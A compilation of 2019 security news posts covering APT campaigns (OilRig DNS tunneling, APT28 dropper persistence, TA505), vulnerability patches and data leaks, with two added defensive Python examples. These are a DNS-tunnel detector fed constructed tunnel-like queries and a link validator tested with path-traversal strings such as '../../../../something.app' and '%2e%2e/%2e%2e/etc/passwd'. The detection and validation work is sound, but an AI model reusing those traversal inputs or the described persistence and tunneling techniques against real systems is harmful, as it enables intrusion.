Much of the malware the group has used in its attacks over the years relies on DNS tunneling to hide communications with the command and control (C&C) infrastructure.

Experts pointed out that DNS tunneling clearly represents one of the preferred communication methods of the group.

OilRig's use of DNS tunneling was first documented in 2016; Trojans in its arsenal that use it include Helminth, ISMAgent, QUADAGENT, BONDUPDATER and ALMACommunicator.


The analysis of the tunneling protocols used by OilRig shows that:

  • All subdomains contain a randomly generated value to avoid the DNS query resulting in a cached response
  • Most rely on an initial handshake to obtain a unique system identifier
  • Most rely on hardcoded IP addresses within the DNS answers to start and stop data transfer
  • Data upload includes a sequence number that allows the C2 to reconstruct the uploaded data in the correct order
  • Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling
  • All of the DNS tunneling protocols will generate a significant number of DNS queries

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.” reads the analysis published by Palo Alto Networks. “Therefore, the protocols must abide by the DNS protocol, so the specially crafted subdomains must have labels (portions of the subdomain separated by periods) must start and end with a letter or digit, contain letters, digits and hyphens and be less than 63 characters in length. Also, the entire domain queried, which includes the C2 domain and the specially crafted subdomain cannot exceed 253 characters.”

All the tools resolve specially crafted subdomains to send data to the command and control servers, but they use the protocol in different ways: they differ in the structure of the subdomains queried, in how the Trojans receive data in the answers, and in how data is packed into the subdomains used to transmit it.
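The traits listed above (a random value in every subdomain, a high query volume, A/AAAA/TXT types) and the DNS constraints quoted from Palo Alto Networks (labels of at most 63 characters of letters, digits and hyphens, 253 characters for the whole name) together give a defender something concrete to look for. The following is an added example (Python; not Palo Alto Networks' code and not a model of any specific OilRig tool) that scores DNS query logs per registered domain on exactly those traits. The log lines are constructed; the thresholds are illustrative starting points, and the registered domain is taken as the last two labels, an assumption that ignores public suffixes such as co.uk.

```python
"""
Added example, not Palo Alto Networks' code: flag registered domains whose
queries look like a DNS tunnel (many queries, nearly all with a distinct,
high-entropy leftmost label), after checking each name against DNS limits.
"""
import math
from collections import defaultdict

# Constructed resolver log lines, not real traffic: "client qtype qname".
# The example-tunnel.net queries mimic the traits described for OilRig's
# protocols: a unique random-looking leftmost label, a sequence-number label,
# mixed A/TXT types and many queries to a single registered domain.
SAMPLE_LOG = """\
10.0.0.5 A 3f9a1c7e0b5d8246.0001.c2.example-tunnel.net
10.0.0.5 A a7e20c9f1b63d845.0002.c2.example-tunnel.net
10.0.0.5 TXT 5c1e9a3f7d0b2846.0003.c2.example-tunnel.net
10.0.0.5 A e0b6d3a81f9c2475.0004.c2.example-tunnel.net
10.0.0.5 A 91f4c7a2e6b0d853.0005.c2.example-tunnel.net
10.0.0.5 TXT d2a8e5f0c3b79164.0006.c2.example-tunnel.net
10.0.0.5 A 6b3f0e1d9a7c2548.0007.c2.example-tunnel.net
10.0.0.5 A c4d7a1b8e2f09635.0008.c2.example-tunnel.net
10.0.0.7 A www.example.org
10.0.0.7 AAAA www.example.org
10.0.0.8 A mail.example.org
10.0.0.9 A img1.static.example-cdn.net
10.0.0.9 A img2.static.example-cdn.net
10.0.0.9 A img3.static.example-cdn.net
10.0.0.9 A img4.static.example-cdn.net
10.0.0.9 A img5.static.example-cdn.net
"""


def entropy(s: str) -> float:
    """Shannon entropy of a string in bits per character (0.0 for empty)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def valid_qname(qname: str) -> bool:
    """The limits every tunneling protocol has to respect: labels of 1-63
    letters, digits or hyphens, not starting or ending with a hyphen, and at
    most 253 characters for the whole name."""
    if not qname or len(qname) > 253:
        return False
    for label in qname.rstrip(".").split("."):
        if not 1 <= len(label) <= 63:
            return False
        if label[0] == "-" or label[-1] == "-":
            return False
        if not all(c.isascii() and (c.isalnum() or c == "-") for c in label):
            return False
    return True


def registered_domain(qname: str) -> str:
    """Last two labels (assumption: no public-suffix handling)."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def domain_stats(lines):
    """Per registered domain: query count, distinct subdomains, query types and
    summed entropy of the leftmost label (the slot tunnels fill with data)."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "qtypes": set(), "entropy_sum": 0.0})
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue                                 # malformed line: skip
        _client, qtype, qname = parts
        if not valid_qname(qname):
            continue                                 # could never be resolved
        dom = registered_domain(qname)
        name = qname.lower().rstrip(".")
        sub = name[: -len(dom) - 1] if name != dom else ""
        st = stats[dom]
        st["queries"] += 1
        st["subdomains"].add(sub)
        st["qtypes"].add(qtype.upper())
        st["entropy_sum"] += entropy(sub.split(".")[0])
    return stats


def suspicious_domains(lines, min_queries=5, min_unique_ratio=0.8, min_entropy=3.0):
    """Domains seen often enough whose subdomains are almost all distinct and
    high-entropy. Thresholds are illustrative, not tuned."""
    flagged = []
    for dom, st in domain_stats(lines).items():
        if st["queries"] < min_queries:
            continue
        unique_ratio = len(st["subdomains"]) / st["queries"]
        mean_entropy = st["entropy_sum"] / st["queries"]
        if unique_ratio >= min_unique_ratio and mean_entropy >= min_entropy:
            flagged.append(dom)
    return sorted(flagged)
```

The example-cdn.net queries show why uniqueness alone is a poor signal: every subdomain is distinct, as on any CDN, but the labels are low-entropy and the domain is left alone. In practice the lines would come from a resolver or Zeek dns.log, the counts would be windowed by time, and the sequence-number label and the A/TXT mix visible in the stats are the next features worth adding.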

Experts observed multiple variants of the Helminth backdoor over the years, all using DNS A queries, but the threat actors changed the generated subdomains between variants to avoid detection.

“There are several variants of Helminth, as the OilRig actors actively developed this Trojan during the course of their attack campaigns. The Helminth Trojan came in two forms, a portable executable version and a PowerShell version, both of which received updates to their DNS tunneling protocol over time.” continues the analysis. “The DNS tunneling protocols used in each variant operated the same way, but the developer would make changes to the generated subdomains to make them look visually different to evade detection.”

OilRig also used the ISMAgent in many campaigns, the malware uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom subdomains. Before transmitting the data, the Trojan issues a beacon to inform the server it is ready.

OilRig also used two variants of ALMA Communicator in its attacks, each with a different domain structure. The two variants sent different information to the server and formatted the data within the DNS tunneling protocol in different ways.

Palo Alto researchers also documented different variants of both the BONDUPDATER tool and QUADAGENT Trojan, the latter uses AAAA queries to transmit/receive data via DNS tunneling.

“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices.” Palo Alto Networks concludes. “One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks,”

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)


Drupal patched security vulnerabilities in Symfony, jQuery

The developers of the Symfony PHP web application framework released updates that patch five vulnerabilities, three affecting the Drupal CMS.

The development team of the Symfony PHP web application framework released security updates for five issues, three of which also affect Drupal 7 and 8.

The three Symfony flaws that affect Drupal are listed in the Drupal security advisory.

The latest versions of Drupal also include a security update to address a jQuery vulnerability: the flaw, rated Moderately critical as a Cross Site Scripting issue, resides in the jQuery.extend() function.

“It’s possible that this vulnerability is exploitable with some Drupal modules.” reads the security advisory published by Drupal. “As a precaution, this Drupal security release backports the fix to jQuery.extend(), without making any other changes to the jQuery version that is included in Drupal core (3.2.1 for Drupal 8 and 1.4.4 for Drupal 7) or running on the site via some other module such as jQuery Update,”

Drupal addressed the flaw with the release of versions 8.6.15, 8.5.15 and 7.66.

Pierluigi Paganini

(SecurityAffairs – hacking, Symfony)


Facebook ‘unintentionally’ collected contacts from 1.5 Million email accounts without permission

Facebook made the headlines once again for alleged violations of the privacy of its users, this time collecting contacts from 1.5 Million email accounts without permission.

New problems for Facebook: the company collected contacts from 1.5 million email accounts without the users' permission.

We recently read about an embarrassing incident involving the social network giant that asked some newly-registered users to provide the passwords to their email accounts to confirm their identity.

Some experts speculated that the social network giant was using the password to access the email accounts and collect their contacts.

News of the day is that Facebook admitted it was collecting the email contacts of some of its users.

“Facebook harvested the email contacts of 1.5 million users without their knowledge or consent when they opened their accounts. Since May 2016, the social-networking company has collected the contact lists of 1.5 million users new to the social network,” reported Business Insider. “The Silicon Valley company said the contact data was “unintentionally uploaded to Facebook,” and it is now deleting them.”

Facebook says it “unintentionally” uploaded the email contacts of up to 1.5 million new users to its servers since May 2016; the company was never authorized to do so and did not obtain the users' consent.

This means that roughly 1.5 million users who entered their email password into Facebook's verification flow also had their email contacts imported by the social network.

According to a Facebook spokesperson who spoke with Business Insider, the company was using harvested data to “build Facebook’s web of social connections and recommend friends to add.”

“At the time, it wasn’t clear what was happening — but on Wednesday, Facebook disclosed to Business Insider that 1.5 million people’s contacts were collected this way and fed into Facebook’s systems, where they were used to improve Facebook’s ad targeting, build Facebook’s web of social connections, and recommend friends to add.” continues the Business Insider.

Facebook stopped using this email verification process a month ago, after a researcher using the pseudonym “e-sushi” noticed that the social network was asking some users to enter their email passwords when they signed up for new accounts.

“Last month we stopped offering email password verification as an option for people verifying their account when signing up for Facebook for the first time. When we looked into the steps people were going through to verify their accounts we found that in some cases people’s email contacts were also unintentionally uploaded to Facebook when they created their account,” the spokesperson said in a statement.

“We estimate that up to 1.5 million people’s email contacts may have been uploaded. These contacts were not shared with anyone and we’re deleting them. We’ve fixed the underlying issue and are notifying people whose contacts were imported. People can also review and manage the contacts they share with Facebook in their settings.”

The list of incidents that involved the company in the last year is long. In April experts found 540 Million Facebook user records on unprotected Amazon S3 buckets.

In March 2019, Facebook admitted to having stored the passwords of hundreds of millions of users in plain text.

In October 2018, Facebook disclosed a severe security breach that allowed hackers to steal access tokens and access personal information from 29 million Facebook accounts.

Pierluigi Paganini

(Security Affairs – Facebook, privacy)


APT28 and Upcoming Elections: evidence of possible interference (Part II)

In mid-March, a suspicious Office document referencing the Ukraine elections appeared in the wild, is it related to APT28 and upcoming elections?

Introduction

The uncertain attribution of the Ukrainian-themed malicious document discussed in our past article “APT28 and Upcoming Elections: Possible Interference Signals” led us to review Sofacy's phishing techniques to confirm or deny the possible involvement of Russian state-sponsored actors in the election interference. We ended up with an old fake hotel reservation request form, containing dummy interactive text boxes used to lure the victims into enabling macro execution.

We analyzed this sample two years ago and linked it to a Sofacy operation uncovered by FireEye researchers in mid-2017, which hit several hotels in European and Middle Eastern countries.

Technical Analysis

Sha256: a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
Threat: APT28 GAMEFISH
Brief Description: GAMEFISH document dropper (reference sample, 2017)
Ssdeep: 1536:009J0E4v13p/gL7Jj4P9bvzKGXpIiUvh23oKRO/HhcKmFoR:fb4v13pYL7J49bvr5Iias32Jc5FoR

The macro code inside the 2017 document is password protected, just like the last suspicious document we analyzed to investigate a possible Ukraine elections interference by Russian groups. After its opening, the reference sample decodes the extracted Base64 content using a custom “DecodeBase64” function:

Figure 1: Custom Base64 decryption routine

The decoded content is actually a DLL file, which is written to “%AppData%\user.dat”. It is then executed through an ASR (Attack Surface Reduction) bypass technique that allows the attackers to spawn a new child process from within the Office environment. This is the same publicly available bypass previously found in the Ukrainian sample (more details in the next section).

Figure 2: Technique used to bypass Microsoft ASR protection

In this reference sample, the purpose of “user.dat” is to create two new artifacts and to set persistence through “HKCU\Environment->UserInitMprLogonScript”. The created files are:

  • %AppData%\mrset.bat
  • %AppData%\mvtband.dat

Figure 3: Persistence setting and artifacts creation by “user.dat” file

The “mrset.bat” file is a short batch file that checks for the existence of “mvtband.dat” and runs it through the “rundll32.exe” system utility.

Figure 4: “mrset.bat” file code

Finally, the “mvtband.dat” file, which is actually a Delphi DLL, is the well-known malware named “GAMEFISH” (f9fd3f1d8da4ffd6a494228b934549d09e3c59d1). Russian groups have used it in reconnaissance phases to steal information from the victim machine and to implant new payloads.

Figure 5: Information retrieved by mvtband.dll

Comparison with Ukrainian Elections Sample


Despite some differences between the “Hospitality campaign” vector and the Ukraine elections one, both use similar TTPs attributed to the APT28 group. The link between the Hospitality malware and the “FancyBear” actor has already been established by the infosec community, so the similarities between it and the Ukrainian elections sample can be used to link the latter to Russian hacker groups.

Both documents under analysis use password-protected macro code. In neither case is the macro code obfuscated; the Hospitality document surprisingly even contains code comments. Moreover, the main macro function is named “Execute” in both documents, and the ASR trick used to create new processes from the Office workspace is substantially the same.

Figure 6. The Ukraine elections macro on the left; Hospitality’s one on the right.

In both cases the real payload is encoded in Base64 and it is stored into an Office hidden section: the first sample uses a document property, the second one employs an XML resource. 

The next stages are different: the Ukraine sample deploys some Powershell obfuscated scripts, which at the end carry an Empire stager, allowing the attackers to directly interact with the victim machine; the reference sample, instead, implants the GAMEFISH malware which automatically exfiltrates victim information while waiting for new payloads to install.

Conclusion

Finally, the attribution of the Ukraine elections sample (highlighted in our previous report) can be confirmed due to the strong similarities with the first stage of the Sofacy’s Hospitality malware, because:

  • Both use password protection.
  • Both have the same function name.
  • Both have the same macro code structure.
  • Both embed the real payload in a hidden document section.
  • The ASR trick is implemented using the same instructions.

The presence of these similarities between the droppers indicates, with high probability, that the attacker is the same and consequently suggests that APT28 is reusing some 2017 tricks and code snippets which, despite their simplicity, keep their attacks effective.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.
Stay Tuned.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, APT28)


Russian TA505 threat actor targets financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russian-based company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back in 2017; it has been active at least since 2015 and targets organizations in the financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including the Dridex banking trojan, the tRAT and FlawedAmmyy RATs, Philadelphia ransomware, GlobeImposter and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 the group also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macro. The macro downloads a payload from the command and control (C&C) server; the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018; it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.


The report states that the indicators of compromise identified in the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attacks.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.

Cisco addresses a critical bug in ASR 9000 series Routers

Cisco released security patches for 30 vulnerabilities, including a critical flaw in ASR 9000 Series Aggregation Services Routers running IOS XR 64-bit.

The critical vulnerability in ASR 9000 Series Aggregation Services Routers running IOS XR 64-bit is tracked as CVE-2019-1710 (CVSS score of 9.8). The flaw could be exploited by an unauthenticated, remote attacker to access internal applications running on the sysadmin virtual machine (VM).

The bug is due to the incorrect isolation of the secondary management interface from internal sysadmin applications.

“An attacker could exploit this vulnerability by connecting to one of the listening internal applications. A successful exploit could result in unstable conditions, including both a denial of service and remote unauthenticated access to the device.” reads the security advisory published by Cisco.

There are workarounds that address this issue, but Cisco recommends installing the software updates it has released to address the flaw. The tech giant fixed the flaw in Cisco IOS XR 64-bit Software Releases 6.5.3 and 7.0.1; applying the fix edits the calvados_boostrap.cfg file and reloads the device.

Cisco will not publish a software maintenance upgrade (SMU) for this vulnerability due to the effectiveness of the workaround.


The Cisco Product Security Incident Response Team (PSIRT) confirmed that it is not aware of any attacks in the wild exploiting the issue.

Cisco also addressed 6 high-severity bugs: in the handling of Inter-Access Point Protocol (IAPP) messages by Wireless LAN Controller (WLC) software, in the administrative GUI configuration and the web-based management interface of WLC software, in the phone book feature of Expressway Series and TelePresence Video Communication Server (VCS), and in the development shell authentication for Aironet Series Access Points running the AP-COS operating system.

The complete list of the addressed vulnerabilities is available on the Cisco security center portal.

Pierluigi Paganini

(SecurityAffairs – hacking, CISCO ASR 9000)

The post Cisco addresses a critical bug in ASR 9000 series Routers appeared first on Security Affairs.

RCE flaw in Electronic Arts Origin client exposes gamers to hack

Electronic Arts (EA) has fixed a security issue in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts (EA) has addressed a vulnerability in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts already released a security patch for the remote code execution vulnerability. The Origin app on Windows is used by tens of millions of gamers. The Origin client for macOS was not affected by this flaw.

The flaw was reported by security experts Dominik Penner and Daley Bee from Underdog Security.

“We located a client-sided template injection, where we proceeded to use an AngularJS sandbox escape and achieve RCE by communicating with QtApplication’s QDesktopServices.” reads a blog post published by Underdog Security.

“To make it easier to access an individual game’s store from the web, the client has its own URL scheme that allows gamers to open the app and load a game from a web page by clicking a link with origin:// in the address.” reported Techcrunch.

“But two security researchers, Daley Bee and Dominik Penner of Underdog Security, found that the app could be tricked into running any app on the victim’s computer.”

The experts shared a proof-of-concept code with Techcrunch to trigger the issue.

Researchers pointed out that the code allowed any app to run at the same level of privileges as the logged-in user. In the following image, the security duo popped open the Windows calculator remotely.


“But worse, a hacker could send malicious PowerShell commands, an in-built app often used by attackers to download additional malicious components and install ransomware.” continues the post.

An attacker could craft a malicious link and send it to the victims via email or include it on a webpage. The issue could also be triggered if the malicious code was combined with a cross-site scripting exploit that ran automatically in the browser.

The flaw can also be exploited by an attacker to take over gamers’ accounts by stealing access tokens with just a single line of code.

Pierluigi Paganini

(SecurityAffairs – hacking, Electronic Arts)

The post RCE flaw in Electronic Arts Origin client exposes gamers to hack appeared first on Security Affairs.

Code execution – Evernote

A local file path traversal issue exists in Evernote 7.9 for macOS which allows an attacker to execute arbitrary programs.

Technical observation:
A crafted URI can be used in a note to perform this attack, using file:/// as an argument or by traversing to any directory (for example ../../../../something.app).

Since Evernote also has a feature of sharing notes, in such a case an attacker could leverage this vulnerability and send crafted notes (.enex) to the victim to perform further attacks.
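As an added illustration of the defensive check (this is example code, not Evernote’s own implementation and not part of the original advisory), the Python function below shows how a note-link handler can refuse the two link shapes described above: a file:/// URI, and a relative path that traverses out of the note’s attachment directory. The attachment root, the allowed-scheme list and the sample links are constructed for the example.

```python
import os
from urllib.parse import urlparse, unquote

# Constructed allowlist for this example: only web links leave the app.
WEB_SCHEMES = {"http", "https"}


def classify_note_link(link: str, attachment_root: str):
    """Decide what a link embedded in a note may open.

    Returns a (kind, target) pair:
      ("web", url)          http(s) links, handed to the browser
      ("attachment", path)  a relative path that stays inside attachment_root
      ("rejected", reason)  file:// and other schemes, absolute paths, paths
                            that traverse out of attachment_root, app bundles
    """
    parsed = urlparse(link.strip())
    scheme = parsed.scheme.lower()

    if scheme in WEB_SCHEMES:
        return ("web", link.strip())

    if scheme:
        # file:///Applications/X.app (or any other scheme) would be handed to
        # the OS launcher by a naive handler; never open it from a note.
        return ("rejected", f"scheme '{scheme}' not allowed")

    # No scheme: treat as a path relative to the note's attachment directory.
    # Percent-decode before inspecting so that %2e%2e is seen as "..".
    rel = unquote(parsed.path)
    if not rel:
        return ("rejected", "empty path")
    if os.path.isabs(rel):
        return ("rejected", "absolute path")

    # Canonicalise both sides and require the candidate to remain under root;
    # this catches ../../../../something.app however deep the traversal goes.
    root = os.path.realpath(attachment_root)
    candidate = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, candidate]) != root:
        return ("rejected", "path escapes attachment directory")

    # An .app bundle is executed rather than displayed when opened.
    if candidate.lower().endswith(".app"):
        return ("rejected", "application bundle")

    return ("attachment", candidate)


if __name__ == "__main__":
    # Constructed sample links, modelled on the link shapes named above.
    root = "/Users/alice/Library/Application Support/Evernote/attachments"
    for sample in ["https://example.com/spec", "images/diagram.png",
                   "file:///Applications/Calculator.app",
                   "../../../../something.app", "%2e%2e/%2e%2e/etc/passwd"]:
        print(sample, "->", classify_note_link(sample, root))
```

The check deliberately decides on the canonical path rather than on the string: rejecting only a literal "../" prefix would miss percent-encoded or nested traversal, while resolving and comparing against the attachment root treats every such variant the same way.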


Patch: 
A patch for this issue was released in Evernote 7.10 Beta 1 and 7.9.1 GA for macOS [MACOSNOTE-28840]. CVE-2019-10038 was assigned to this issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj_)

Original post at:

https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html

Pierluigi Paganini

(Security Affairs – Evernote, hacking)

The post Code execution – Evernote appeared first on Security Affairs.

Justdial is leaking personal details of all customers real-time

A database belonging to the Indian local search service JustDial was left online without protection exposing personal data of over 100M users.

The archive is still leaking personally identifiable information of JustDial customers who access the service via its website, mobile app, or even by calling the customer care number (“88888 88888”).

The news was first reported by The Hacker News that independently verified the authenticity of the story.

JustDial is the largest and oldest search engine in India that allows its users to find vendors of various products and services.

The independent researcher Rajshekhar Rajaharia discovered an unprotected, publicly accessible API endpoint that exposes JustDial’s database to anyone.

The leaked data includes username, email, mobile number, address, gender, date of birth, photo, occupation, company name and more.

According to the expert, the data has been exposed since at least mid-2015 through the unprotected API; at this time it is not clear whether anyone has accessed the huge trove of data.


Experts at THN provided Rajshekhar with a new phone number that had never been registered with JustDial, then used it to contact the JustDial service and request information on restaurants. The service created a profile associated with the number provided by THN, and Rajshekhar was able to retrieve that profile through the exposed endpoint, which confirmed that the exposed database was the one used by production systems.

“Although the unprotected API is connected to the primary JD database, Rajshekhar revealed that it’s an old API endpoint which is not currently being used by the company but left forgotten on the server.” reads the post published by THN.

Rajshekhar discovered this unprotected end-point while conducting a penetration test on the latest APIs, which are apparently protected.

Rajshekhar also found other issues associated with the old unprotected APIs; one of them could be exploited by anyone to trigger an OTP request for any registered phone number, making it possible to spam users.

Rajshekhar attempted to report the issues to the company but without success.

Pierluigi Paganini

(SecurityAffairs – hacking, JustDial)

The post Justdial is leaking personal details of all customers real-time appeared first on Security Affairs.

European Commission is not in possession of evidence of issues with Kaspersky products

The European Commission confirmed that it has no evidence of issues associated with using products designed by Kaspersky Lab.

In June 2018, European Parliament passed a resolution that classified the security firm’s software as “malicious” due to the alleged link of the company with the Russian intelligence.

The call for a ban on Kaspersky’s software among the members of the European Union was part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

“Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.” stated the report.

The European Parliament adopted the A8-0189/2018 motion that could ban the products of the security giant from European Union institutions.

Kaspersky was accused of working for Russian intelligence, and many EU states, including the U.K., the Netherlands and Lithuania, banned its products.

In response to a March 2019 inquiry from Gerolf Annemans, European Parliament member from Belgium, the European Commission confirmed that it is not aware of problems with the products of Kaspersky Lab.

Citing the experience of Germany, France, and Belgium, which never found any issues with the use of Kaspersky Lab solutions, Annemans asked the European Commission for further clarification.


Annemans asked whether the European Commission knows “any reason other than certain press articles that justifies the labelling of Kaspersky as ‘dangerous’ or ‘malicious’.”

He asked for technical proof of problems and “any reports or opinions of cyber experts or consultancies about Kaspersky Lab.”

“The Commission is not in possession of any evidence regarding potential issues related to the use of Kaspersky Lab products.” reads the response of the Commission. “The Commission is following closely debates and developments concerning the security of IT products and devices in general, including discussions about potential measures related to access to the EU market.”

“Regarding reports or opinions published concerning the issue raised by the Honourable Member, the Commission did not commission any reports,”

Pierluigi Paganini

(SecurityAffairs – European Commission, Kaspersky Lab)

The post European Commission is not in possession of evidence of issues with Kaspersky products appeared first on Security Affairs.